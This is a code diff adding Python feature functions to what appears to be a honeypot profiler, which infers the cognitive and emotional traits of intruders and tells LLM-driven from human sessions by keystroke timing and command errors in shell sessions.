+    if not ctx.output_events or len(pairs) < FEEDBACK_MIN_PAIRS:
+        if not ctx.commands:
+            return
+        yield make_observation(
+            ctx,
+            primitive="cognitive.feedback_loop_engagement",
+            value="unknown",
+            confidence=1.0,
+        )
+        return
+    xs = [float(p[0]) for p in pairs]
+    ys = [float(p[1]) for p in pairs]
+    try:
+        r = statistics.correlation(xs, ys)
+    except statistics.StatisticsError:
+        # Constant series on either axis — correlation undefined.
+        yield make_observation(
+            ctx,
+            primitive="cognitive.feedback_loop_engagement",
+            value="unknown",
+            confidence=1.0,
+        )
+        return
+    if r > FEEDBACK_CORRELATION_MIN:
+        value = "closed_loop"
+    else:
+        value = "fire_and_forget"
+    yield make_observation(
+        ctx,
+        primitive="cognitive.feedback_loop_engagement",
+        value=value,
+        confidence=0.75,
+    )
+
+
+def error_resilience_fallback_to_man(ctx: SessionContext) -> Iterator[Observation]:
+    """Emit ``cognitive.error_resilience.fallback_to_man``.
+
+    For each errored command, check whether the operator's next
+    command is ``man`` / ``help`` / ``info`` — i.e. they reached for
+    the manual rather than re-trying or pivoting. If at least one
+    errored command triggered this fallback → ``present``; otherwise
+    ``absent``.
+
+    Skip emission when no commands errored — the registry's binary
+    has no ``unknown``, and emitting ``absent`` from no observation
+    at all would be dishonest.
+
+    The ``--help`` / ``-h`` flag forms can't fire this primitive in
+    v0.1: they aren't first tokens, and the engine only retains
+    ``first_token_hash`` per command (PII discipline). Filed for v0.2.
+    """
+    errored_indices = [i for i, c in enumerate(ctx.commands) if c.errored]
+    if not errored_indices:
+        return
+    fallback_count = 0
+    for i in errored_indices:
+        if i + 1 >= len(ctx.commands):
+            continue
+        if ctx.commands[i + 1].first_token_hash in _HELP_FAMILY_HASHES:
+            fallback_count += 1
+    value = "present" if fallback_count > 0 else "absent"
+
+    if len(errored_indices) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
+        confidence = 0.40
+    else:
+        confidence = 0.65
+    yield make_observation(
+        ctx,
+        primitive="cognitive.error_resilience.fallback_to_man",
+        value=value,
+        confidence=confidence,
+    )
+
+
+def error_resilience_frustration_typing(ctx: SessionContext) -> Iterator[Observation]:
+    """Emit ``cognitive.error_resilience.frustration_typing``.
+
+    Compares median within-command IAT for commands *following* an
+    errored command against the same statistic for commands following
+    a successful command. A large relative delta indicates the operator
+    typed differently after a failure — speed-up (rage / fluency) or
+    slowdown (caution); both are signs of arousal.
+
+    Skip emission when either group is empty (no errors, or every
+    command errored — no clean baseline). Sample-size honesty drops
+    confidence below the floor.
+    """
+    post_err: list[float] = []
+    post_ok: list[float] = []
+    cmds = ctx.commands
+    intra = ctx.intra_command_iats
+    if len(cmds) < 2 or len(intra) != len(cmds):
+        return
+    for i in range(1, len(cmds)):
+        cmd_iats = intra[i]
+        if not cmd_iats:
+            continue
+        m = statistics.median(cmd_iats)
+        if cmds[i - 1].errored:
+            post_err.append(m)
+        else:
+            post_ok.append(m)
+    if not post_err or not post_ok:
+        return
+    median_err = statistics.median(post_err)
+    median_ok = statistics.median(post_ok)
+    if median_ok <= 0.0:
+        return
+    delta = abs(median_err - median_ok) / median_ok
+
+    if delta < FRUSTRATION_LOW_MAX:
+        value = "low"
+    elif delta < FRUSTRATION_MODERATE_MAX:
+        value = "moderate"
+    else:
+        value = "high"
+
+    if len(post_err) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
+        confidence = 0.40
+    else:
+        confidence = 0.60
+    yield make_observation(
+        ctx,
+        primitive="cognitive.error_resilience.frustration_typing",
+        value=value,
+        confidence=confidence,
+    )
+
+
+def error_resilience_retry_tactic(ctx: SessionContext) -> Iterator[Observation]:
+    """Emit ``cognitive.error_resilience.retry_tactic``.
+
+    For each command with ``Command.errored=True``, classify the
+    operator's response by the *next* command:
+
+    * **rerun** — same first_token_hash as the errored command. The
+      operator re-invoked the same tool (often after fixing args
+      mid-edit, but we can't see args).
+    * **switch** — different first_token_hash. Pivoted to a different
+      tool.
+    * **abort** — no next command. Session ended after the error.
+
+    The session's reported tactic is the **modal** response across all
+    errored commands (with ties broken in registry order: rerun >
+    modify > switch > abort). Skip emission entirely when no commands
+    errored — the registry has no ``unknown`` here, and silence is the
+    most honest answer.
+
+    The ``modify`` value (edit-and-retry) requires within-command
+    diffing of arg tokens, which crosses the PII boundary the engine
+    holds (only ``first_token_hash`` is retained per command). v0.1
+    therefore never emits ``modify``; v0.2 will once the PII trade-off
+    is revisited against a real attacker corpus.
+    """
+    errored = [(i, c) for i, c in enumerate(ctx.commands) if c.errored]
+    if not errored:
+        return
+    counts = {"rerun": 0, "switch": 0, "abort": 0}
+    for i, cmd in errored:
+        if i + 1 >= len(ctx.commands):
+            counts["abort"] += 1
+        elif ctx.commands[i + 1].first_token_hash == cmd.first_token_hash:
+            counts["rerun"] += 1
+        else:
+            counts["switch"] += 1
+    # Registry-order tiebreak (rerun > modify > switch > abort).
+    # `modify` deferred — never increments here.
+    order = ("rerun", "switch", "abort")
+    value = max(order, key=lambda k: counts[k])
+
+    if len(errored) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
+        confidence = 0.40
+    else:
+        confidence = 0.65
+    yield make_observation(
+        ctx,
+        primitive="cognitive.error_resilience.retry_tactic",
+        value=value,
+        confidence=confidence,
+    )
+
+
+def tool_vocabulary(ctx: SessionContext) -> Iterator[Observation]:
+    """Emit ``cognitive.tool_vocabulary`` ∈ {narrow, moderate, broad}.
+
+    Absolute count of distinct first_token_hashes. Skip emission when
+    no commands exist; below the sample-size floor we still emit, but
+    at confidence 0.40 — a session with few commands but five distinct
+    tools is genuinely a moderate-vocabulary signal.
+    """
+    if not ctx.commands:
+        return
+    distinct = len({c.first_token_hash for c in ctx.commands})
+    if distinct <= TOOL_VOCAB_NARROW_MAX:
+        value = "narrow"
+    elif distinct >= TOOL_VOCAB_BROAD_MIN:
+        value = "broad"
+    else:
+        value = "moderate"
+    if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
+        confidence = 0.40
+    else:
+        confidence = 0.70
+    yield make_observation(
+        ctx,
+        primitive="cognitive.tool_vocabulary",
+        value=value,
+        confidence=confidence,
+    )
+
+
+def planning_depth(ctx: SessionContext) -> Iterator[Observation]:
+    """Emit ``cognitive.planning_depth`` ∈ {deep, shallow, reactive}.
+
+    Read off the distribution of inter-command IATs:
+
+    * **deep** — many think-pauses (> ``IKI_THINK_MAX_S``). The
+      operator stops to think between commands.
+    * **reactive** — most pauses are sub-instant
+      (≤ ``INTER_CMD_INSTANT_MAX``). Knee-jerk pacing — automated
+      runner, prepared playbook, or an LLM with no internal latency.
+    * **shallow** — neither: mostly typing-speed pauses, no extended
+      contemplation.
+
+    Skip emission when no inter-command IATs exist (one or zero
+    commands); the registry has no ``unknown`` for this primitive.
+    """
+    iats = ctx.inter_cmd_iats
+    if not iats:
+        return
+    n = len(iats)
+    deep_count = sum(1 for x in iats if x > IKI_THINK_MAX_S)
+    reactive_count = sum(1 for x in iats if x <= INTER_CMD_INSTANT_MAX)
+    deep_frac = deep_count / n
+    reactive_frac = reactive_count / n
+
+    if deep_frac >= PLANNING_DEEP_MIN:
+        value = "deep"
+    elif reactive_frac >= PLANNING_REACTIVE_MIN:
+        value = "reactive"
+    else:
+        value = "shallow"
+
+    if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
+        confidence = 0.40
+    else:
+        confidence = 0.65
+    yield make_observation(
+        ctx,
+        primitive="cognitive.planning_depth",
+        value=value,
+        confidence=confidence,
+    )
+
+
+def exploration_style(ctx: SessionContext) -> Iterator[Observation]:
+    """Emit ``cognitive.exploration_style`` ∈ {methodical, chaotic, targeted}.
+
+    Two-axis classification over the first_token_hash sequence:
+
+    * **methodical** — low repetition, low backtracks. Operator marches
+      forward through new tools.
+    * **targeted** — high repetition (R ≥ EXPLORATION_TARGETED_REP_MIN).
+      Same tool re-invoked repeatedly; the operator is drilling.
+    * **chaotic** — high backtrack rate (J ≥ EXPLORATION_CHAOTIC_BACKTRACK_MIN).
+      Jumps among previously-used tools without a clear thread.
+
+    The registry doesn't permit ``unknown``; below the
+    MIN_COMMANDS_FOR_FULL_CONFIDENCE floor we emit at confidence 0.40
+    rather than skip — the engine has *some* signal, just less of it.
+    Skip emission only when there are no commands at all.
+    """
+    n = len(ctx.commands)
+    if n == 0:
+        return
+    hashes = [c.first_token_hash for c in ctx.commands]
+    unique = len(set(hashes))
+    repetition_rate = 0.0 if n == 0 else 1.0 - (unique / n)
+
+    # Backtrack: at position i, hashes[i] previously seen at index < i-1
+    # and not equal to hashes[i-1]. (Repeating the immediate predecessor
+    # is "drilling", picked up by repetition_rate; backtrack is the
+    # non-local jump signal.)
+    seen_before: set[str] = set()
+    backtracks = 0
+    transitions = 0
+    if hashes:
+        seen_before.add(hashes[0])
+    for i in range(1, n):
+        transitions += 1
+        if hashes[i] != hashes[i - 1] and hashes[i] in seen_before:
+            backtracks += 1
+        seen_before.add(hashes[i])
+    backtrack_rate = (backtracks / transitions) if transitions else 0.0
+
+    if backtrack_rate >= EXPLORATION_CHAOTIC_BACKTRACK_MIN:
+        value = "chaotic"
+    elif repetition_rate >= EXPLORATION_TARGETED_REP_MIN:
+        value = "targeted"
+    else:
+        value = "methodical"
+
+    if n < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
+        confidence = 0.40
+    else:
+        confidence = 0.60
+    yield make_observation(
+        ctx,
+        primitive="cognitive.exploration_style",
+        value=value,
+        confidence=confidence,
+    )
+
+
+def cognitive_load(ctx: SessionContext) -> Iterator[Observation]:
+    """Emit ``cognitive.cognitive_load`` ∈ {low, medium, high}.
+
+    Composite of three [0, 1]-clipped sub-signals, mean-aggregated:
+
+    * **chunking** — median CV of intra-command IATs / reference CV.
+      Fragmented mid-command typing → high contribution.
+    * **errors** — fraction of commands whose post-execution output
+      matched a canonical error fingerprint (``Command.errored`` from
+      Step D.0). Failures pile load.
+    * **pace variability** — CV of inter-command IATs / reference CV.
+      A spread of think-pause durations → unsettled cadence → load.
+
+    Components missing data contribute 0.0 (no penalty for an absent
+    signal), and the composite normalises by *available* component
+    count so a session with zero inter-command pauses isn't punished
+    for the silence. Skip emission entirely when no commands at all
+    exist — there's no honest answer.
+
+    v0.1 thresholds; D.8 re-tunes once the rest of Phase D is stable.
+    """
+    if not ctx.commands:
+        return
+
+    # Component A: chunking variance — median within-command CV
+    per_cmd_cvs: list[float] = []
+    for cmd_iats in ctx.intra_command_iats:
+        cv = _cv(cmd_iats)
+        if cv is not None:
+            per_cmd_cvs.append(cv)
+    if per_cmd_cvs:
+        chunking_load: float | None = _clip01(
+            statistics.median(per_cmd_cvs) / COGNITIVE_LOAD_CHUNKING_REF_CV
+        )
+    else:
+        chunking_load = None
+
+    # Component B: error rate
+    error_load: float = sum(1 for c in ctx.commands if c.errored) / len(ctx.commands)
+    error_load = _clip01(error_load)
+
+    # Component C: pace variability — CV of inter-command IATs
+    pace_cv = _cv(ctx.inter_cmd_iats)
+    if pace_cv is not None:
+        pace_load: float | None = _clip01(pace_cv / COGNITIVE_LOAD_PACE_REF_CV)
+    else:
+        pace_load = None
+
+    components = [c for c in (chunking_load, error_load, pace_load) if c is not None]
+    if not components:
+        return
+    load = sum(components) / len(components)
+
+    if load < COGNITIVE_LOAD_LOW_MAX:
+        value = "low"
+    elif load < COGNITIVE_LOAD_MEDIUM_MAX:
+        value = "medium"
+    else:
+        value = "high"
+
+    if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
+        confidence = 0.40
+    else:
+        # Composite over three soft sub-signals — held below the
+        # cap of single-source primitives. D.8 re-tunes.
+        confidence = 0.60
+    yield make_observation(
+        ctx,
+        primitive="cognitive.cognitive_load",
+        value=value,
+        confidence=confidence,
+    )
+
+
+def inter_command_consistency(ctx: SessionContext) -> Iterator[Observation]:
+    """Emit ``cognitive.inter_command_consistency``.
+
+    CV (stdev / mean) of inter-command IATs.
+
+    * ``metronomic`` (CV < 0.40) → LLM-pure. Empirical anchor:
+      LLM-simulated session CV ≈ 0.24 in this corpus.
+    * ``variable`` (0.40 ≤ CV < 1.50) → human. Empirical anchor:
+      human session CV ≈ 0.94.
+    * ``bimodal`` (CV ≥ 1.50) → LLM-assisted human, heuristic. v0.1
+      uses CV-only; true bimodal detection (Hartigan dip / two-peak)
+      is filed for v0.2 per the registry's ``notes:`` field.
+    """
+    iats = ctx.inter_cmd_iats
+    if len(iats) < 2:
+        return
+    mean = statistics.fmean(iats)
+    if mean <= 0.0:
+        return
+    cv = statistics.stdev(iats) / mean
+    if cv < PAUSE_CV_METRONOMIC_MAX:
+        value = "metronomic"
+    elif cv >= PAUSE_CV_BIMODAL_MIN:
+        value = "bimodal"
+    else:
+        value = "variable"
+    confidence = (
+        0.40 if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE else 0.75
+    )
+    yield make_observation(
+        ctx,
+        primitive="cognitive.inter_command_consistency",
+        value=value,
+        confidence=confidence,
+    )
--- a/decnet/profiler/behave_shell/_features/emotional_valence.py
+++ b/decnet/profiler/behave_shell/_features/emotional_valence.py
@@ -0,0 +1,223 @@
+"""``emotional_valence.*`` feature functions (Phase G, soft block).
+
+All four primitives in this module ride a hard 0.5 confidence cap
+(:data:`EMOTIONAL_VALENCE_CONFIDENCE_CAP`). Cap is enforced inside
+the feature functions, *not* via :func:`make_observation` — sample-size
+honesty may still pull confidence below 0.5.
+
+Step G.5: ``emotional_valence.valence``.
+Step G.6: ``emotional_valence.arousal`` (lands later).
+Step G.7: ``emotional_valence.stress_response`` (lands later).
+Step G.8: ``emotional_valence.frustration_venting`` (lands later).
+"""
+from __future__ import annotations
+
+import statistics
+from typing import Iterator
+
+from behave_core.spec.envelope import Observation
+
+from decnet.profiler.behave_shell._ctx import SessionContext
+from decnet.profiler.behave_shell._features._emit import make_observation
+from decnet.profiler.behave_shell._thresholds import (
+    AROUSAL_BANG_RUN_MIN,
+    AROUSAL_CALM_IAT_S,
+    AROUSAL_CAPS_RUN_MIN,
+    AROUSAL_FAST_IAT_S,
+    AROUSAL_MIN_IATS,
+    EMOTIONAL_VALENCE_CONFIDENCE_CAP,
+    FRUST_VENT_FULL_CONFIDENCE_MIN,
+    FRUST_VENT_MIN_TYPED_CHARS,
+    STRESS_DISTRESS_RATIO_MIN,
+    STRESS_EUSTRESS_RATIO_MIN,
+    STRESS_MIN_ERRORED_WITH_IATS,
+    VALENCE_FULL_CONFIDENCE_MIN,
+    VALENCE_MIN_HITS,
+    VALENCE_MIN_TYPED_CHARS,
+)
+
+
+def _cap_soft(c: float) -> float:
+    """Clamp confidence to the soft-primitive ceiling."""
+    return min(c, EMOTIONAL_VALENCE_CONFIDENCE_CAP)
+
+
+def valence(ctx: SessionContext) -> Iterator[Observation]:
+    """Emit ``emotional_valence.valence`` ∈ {positive, neutral, negative}.
+
+    Pure ratio over the lexical counters built in G.0:
+
+    * ``positive`` — ``positive_lex_hits > negative_lex_hits +
+      obscenity_hits`` AND ``positive_lex_hits ≥ VALENCE_MIN_HITS`` (2).
+    * ``negative`` — ``negative_lex_hits + obscenity_hits >
+      positive_lex_hits`` AND that sum ≥ ``VALENCE_MIN_HITS``.
+    * ``neutral`` — fall-through.
+
+    Skip emission below ``VALENCE_MIN_TYPED_CHARS`` (80) typed letters.
+    Confidence hard-capped at 0.50 (registry convention); 0.30 below
+    ``VALENCE_FULL_CONFIDENCE_MIN`` (200).
+    """
+    if ctx.typed_letter_count < VALENCE_MIN_TYPED_CHARS:
+        return
+    pos = ctx.positive_lex_hits
+    neg_total = ctx.negative_lex_hits + ctx.obscenity_hits
+    if pos > neg_total and pos >= VALENCE_MIN_HITS:
+        value = "positive"
+    elif neg_total > pos and neg_total >= VALENCE_MIN_HITS:
+        value = "negative"
+    else:
+        value = "neutral"
+    raw = 0.50 if ctx.typed_letter_count >= VALENCE_FULL_CONFIDENCE_MIN else 0.30
+    yield make_observation(
+        ctx,
+        primitive="emotional_valence.valence",
+        value=value,
+        confidence=_cap_soft(raw),
+    )
+
+
+def arousal(ctx: SessionContext) -> Iterator[Observation]:
+    """Emit ``emotional_valence.arousal`` ∈ {low_calm, medium_engaged,
+    high_agitated}.
+
+    Three signals (any of which fires ``high_agitated``):
+
+    * ``ctx.caps_run_max ≥ AROUSAL_CAPS_RUN_MIN`` (5) — capslock rant.
+    * ``ctx.bang_run_max ≥ AROUSAL_BANG_RUN_MIN`` (3) — repeated bangs.
+    * The fastest typing burst's median IAT < ``AROUSAL_FAST_IAT_S``
+      (0.06) over a burst of ≥ ``AROUSAL_MIN_IATS`` (30) IATs.
+
+    ``low_calm`` — slowest qualifying burst's median IAT >
+    ``AROUSAL_CALM_IAT_S`` (0.30).
+
+    ``medium_engaged`` — fall-through.
+
+    Skip emission when no qualifying typing bursts. Confidence hard-
+    capped at 0.50; 0.30 below ``AROUSAL_MIN_IATS`` total typed IATs.
+    """
+    qualifying = [b for b in ctx.typing_bursts if len(b) >= 3]
+    if not qualifying:
+        return
+    fastest_med = min(statistics.median(b) for b in qualifying)
+    slowest_med = max(statistics.median(b) for b in qualifying)
+    total_iats = sum(len(b) for b in qualifying)
+
+    if (
+        ctx.caps_run_max >= AROUSAL_CAPS_RUN_MIN
+        or ctx.bang_run_max >= AROUSAL_BANG_RUN_MIN
+        or (
+            total_iats >= AROUSAL_MIN_IATS
+            and fastest_med < AROUSAL_FAST_IAT_S
+        )
+    ):
+        value = "high_agitated"
+    elif total_iats >= AROUSAL_MIN_IATS and slowest_med > AROUSAL_CALM_IAT_S:
+        value = "low_calm"
+    else:
+        value = "medium_engaged"
+    raw = 0.50 if total_iats >= AROUSAL_MIN_IATS else 0.30
+    yield make_observation(
+        ctx,
+        primitive="emotional_valence.arousal",
+        value=value,
+        confidence=_cap_soft(raw),
+    )
+
+
+def stress_response(ctx: SessionContext) -> Iterator[Observation]:
+    """Emit ``emotional_valence.stress_response`` ∈ {none,
+    eustress_positive, distress_negative}.
+
+    Compare typing speed *after* an errored command vs the session
+    baseline:
+
+    * For each errored command at index ``i``, gather
+      ``ctx.intra_command_iats[i+1]`` — the response command's intra-
+      command IATs.
+    * Baseline: median of all intra-command IATs from commands NOT
+      immediately following an errored command.
+
+    Verdict by ratio of post-error / baseline:
+
+    * ratio ≥ ``STRESS_EUSTRESS_RATIO_MIN`` (1.20) → ``eustress_positive``
+      (slowed down — recovered, deliberate).
+    * ratio ≤ ``1 / STRESS_DISTRESS_RATIO_MIN`` → ``distress_negative``
+      (sped up — anxious, mashing keys).
+    * otherwise → ``none``.
+
+    Skip emission when no commands. Confidence hard-capped at 0.50;
+    0.30 below ``STRESS_MIN_ERRORED_WITH_IATS`` (2) errored commands
+    with non-empty post-error IAT data.
+    """
+    if not ctx.commands:
+        return
+    post_error_iats: list[float] = []
+    baseline_iats: list[float] = []
+    n = len(ctx.commands)
+    qualifying_errored = 0
+    for i, cmd in enumerate(ctx.commands):
+        is_post_error = i > 0 and ctx.commands[i - 1].errored
+        iats = list(ctx.intra_command_iats[i]) if i < len(ctx.intra_command_iats) else []
+        if is_post_error:
+            if iats:
+                qualifying_errored += 1
+                post_error_iats.extend(iats)
+        else:
+            baseline_iats.extend(iats)
+        # mypy: silence unused-var on n / cmd (kept for clarity)
+        _ = (n, cmd)
+    if not post_error_iats or not baseline_iats:
+        value = "none"
+    else:
+        med_post = statistics.median(post_error_iats)
+        med_base = statistics.median(baseline_iats)
+        if med_base <= 0.0:
+            value = "none"
+        else:
+            ratio = med_post / med_base
+            if ratio >= STRESS_EUSTRESS_RATIO_MIN:
+                value = "eustress_positive"
+            elif ratio <= 1.0 / STRESS_DISTRESS_RATIO_MIN:
+                value = "distress_negative"
+            else:
+                value = "none"
+    raw = 0.50 if qualifying_errored >= STRESS_MIN_ERRORED_WITH_IATS else 0.30
+    yield make_observation(
+        ctx,
+        primitive="emotional_valence.stress_response",
+        value=value,
+        confidence=_cap_soft(raw),
+    )
+
+
+def frustration_venting(ctx: SessionContext) -> Iterator[Observation]:
+    """Emit ``emotional_valence.frustration_venting`` ∈ {none, detected}.
+
+    Pure read of ``ctx.obscenity_hits`` (G.0 lexical counter):
+
+    * ``detected`` — ``obscenity_hits ≥ 1``.
+    * ``none`` — zero hits.
+
+    Skip emission below ``FRUST_VENT_MIN_TYPED_CHARS`` (30) typed
+    letters — too thin to call cleanly absent. Confidence hard-capped
+    at 0.50; 0.40 when ``detected``; 0.50 only when ``none`` AND
+    typed_letter_count ≥ ``FRUST_VENT_FULL_CONFIDENCE_MIN`` (200);
+    0.30 otherwise.
+    """
+    if ctx.typed_letter_count < FRUST_VENT_MIN_TYPED_CHARS:
+        return
+    if ctx.obscenity_hits >= 1:
+        value = "detected"
+        raw = 0.40
+    else:
+        value = "none"
+        if ctx.typed_letter_count >= FRUST_VENT_FULL_CONFIDENCE_MIN:
+            raw = 0.50
+        else:
+            raw = 0.30
+    yield make_observation(
+        ctx,
+        primitive="emotional_valence.frustration_venting",
+        value=value,
+        confidence=_cap_soft(raw),
+    )
--- a/Show More
+++ b/Show More
				`@@ -0,0 +1 @@`
				`"""Artifact storage helpers shared between the web router and TTP workers."""`